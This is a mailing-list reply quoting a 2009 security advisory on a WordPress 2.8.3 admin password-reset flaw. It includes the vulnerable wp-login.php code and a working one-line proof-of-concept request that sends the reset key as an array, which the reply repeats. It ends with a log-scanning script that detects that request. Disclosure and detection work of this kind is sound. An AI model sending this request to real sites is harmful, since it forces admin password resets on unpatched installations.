
Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password



Hi there,
"What would the "attacker" submit as a query to the server?"

Simply:
/wp-login.php?action=rp&key[]=

And the admin passwd would be reset.

Regards.


2009/8/11 Rafal M. Los <rafal@xxxxxxxxxxxxxxxx>

>  Hi Laurent,
>     Pardon my stupidity... I seem to be missing something tonight.  Can
> you explain a little further for someone who doesn’t have coding (php)
> background?  What would the "attacker" submit as a query to the server?
> What specifically triggers the vulnerability?
>
> Rafal M. Los
> Security & IT Risk Strategist
>
>  - Blog:         http://preachsecurity.blogspot.com
>  - LinkedIn:  http://www.linkedin.com/in/rmlos
>  - Twitter:     http://twitter.com/RafalLos
>
>  *From:* laurent gaffie <laurent.gaffie@xxxxxxxxx>
> *Sent:* Monday, August 10, 2009 9:09 PM
> *To:* full-disclosure@xxxxxxxxxxxxxxxxx
> *Subject:* [Full-disclosure] WordPress <= 2.8.3 Remote admin reset
> password
>
> =============================================
> - Release date: August 10th, 2009
> - Discovered by: Laurent Gaffié
> - Severity: Medium
> =============================================
>
> I. VULNERABILITY
> -------------------------
> WordPress <= 2.8.3 Remote admin reset password
>
> II. BACKGROUND
> -------------------------
> WordPress is a state-of-the-art publishing platform with a focus on
> aesthetics, web standards, and usability.
> WordPress is both free and priceless at the same time.
> More simply, WordPress is what you use when you want to work with your
> blogging software, not fight it.
>
> III. DESCRIPTION
> -------------------------
> The way Wordpress handles a password reset looks like this:
> You submit your email address or username via this form
> /wp-login.php?action=lostpassword ;
> Wordpress sends you a reset confirmation like that via email:
>
> "
> Someone has asked to reset the password for the following site and
> username.
> http://DOMAIN_NAME.TLD/wordpress
> Username: admin
> To reset your password visit the following address, otherwise just ignore
> this email and nothing will happen
>
>
> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
> "
>
> You click on the link, and then Wordpress resets your admin password, and
> sends you over another email with your new credentials.
>
> Let's see how it works:
>
>
> wp-login.php:
> ...[snip]....
> line 186:
> function reset_password($key) {
>     global $wpdb;
>
>     $key = preg_replace('/[^a-z0-9]/i', '', $key);
>
>     if ( empty( $key ) )
>         return new WP_Error('invalid_key', __('Invalid key'));
>
>     $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
>     if ( empty( $user ) )
>         return new WP_Error('invalid_key', __('Invalid key'));
> ...[snip]....
> line 276:
> $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
> $errors = new WP_Error();
>
> if ( isset($_GET['key']) )
>     $action = 'resetpass';
>
> // validate action so as to default to the login screen
> if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
>     $action = 'login';
> ...[snip]....
>
> line 370:
>
> break;
>
> case 'resetpass' :
> case 'rp' :
>     $errors = reset_password($_GET['key']);
>
>     if ( ! is_wp_error($errors) ) {
>         wp_redirect('wp-login.php?checkemail=newpass');
>         exit();
>     }
>
>     wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
>     exit();
>
> break;
> ...[snip ]...
>
> You can abuse the password reset function, and bypass the first step and
> then reset the admin password by submitting an array to the $key variable.
>
>
> IV. PROOF OF CONCEPT
> -------------------------
> A web browser is sufficient to reproduce this Proof of concept:
> http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
> The password will be reset without any confirmation.
>
> V. BUSINESS IMPACT
> -------------------------
> An attacker could exploit this vulnerability to compromise the admin
> account of any wordpress/wordpress-mu <= 2.8.3
>
> VI. SYSTEMS AFFECTED
> -------------------------
> All
>
> VII. SOLUTION
> -------------------------
> No patch available for the moment.
>
> VIII. REFERENCES
> -------------------------
> http://www.wordpress.org
>
> IX. CREDITS
> -------------------------
> This vulnerability has been discovered by Laurent Gaffié
> Laurent.gaffie{remove-this}(at)gmail.com
> I'd like to shoot some greetz to securityreason.com for their great
> research on PHP, as for this under-estimated vulnerability discovered by
> Maksymilian Arciemowicz :
> http://securityreason.com/achievement_securityalert/38
>
> X. REVISION HISTORY
> -------------------------
> August 10th, 2009: Initial release
>
> XI. LEGAL NOTICES
> -------------------------
> The information contained within this advisory is supplied "as-is"
> with no warranties or guarantees of fitness of use or otherwise.
> I accept no responsibility for any damage caused by the use or
> misuse of this information.
>
> ------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
follow me @twitter ! : http://twitter.com/laurentgaffie
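
For anyone checking whether the request discussed in this thread has hit their own site, the following is an added example (not part of the original posts and not WordPress code) that scans access-log lines for requests to wp-login.php in which `key` arrives in PHP array syntax, either literal or percent-encoded. The log lines are constructed samples in combined log format, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [11/Aug/2009:09:12:01 +0000] "GET /wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.44 - - [11/Aug/2009:09:13:37 +0000] "GET /wp-login.php?action=rp&key[]= HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.44 - - [11/Aug/2009:09:13:40 +0000] "GET /blog/wp-login.php?action=rp&key%5B%5D= HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.77 - - [11/Aug/2009:09:15:02 +0000] "GET /wp-login.php?action=lostpassword HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.0.2.90 - - [11/Aug/2009:09:16:11 +0000] "GET /index.php?key[]=x HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

# Client address and request target from one combined-format line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# A parameter name that PHP turns into an array: key[], key[0], key[a][b], ...
ARRAY_KEY_RE = re.compile(r"key\[[^\]]*\]")


def is_array_key_reset(target):
    """True if the target is wp-login.php and `key` is sent as an array."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/wp-login.php"):
        return False
    # parse_qsl percent-decodes names, so key%5B%5D and key[] compare equal.
    # `action` is not checked: the quoted code switches to 'resetpass'
    # whenever $_GET['key'] is set.
    names = [n for n, _ in parse_qsl(parts.query, keep_blank_values=True)]
    return any(ARRAY_KEY_RE.match(n) for n in names)


def find_array_key_resets(log_text):
    """Return (client_ip, request_target) for every matching log line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_array_key_reset(m.group("target")):
            hits.append((m.group("ip"), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, target in find_array_key_resets(SAMPLE_LOG):
        print(ip, target)
```

A legitimate reset link carries `key` as a plain string, so any hit is worth correlating with unexpected "new password" e-mails sent to the admin address.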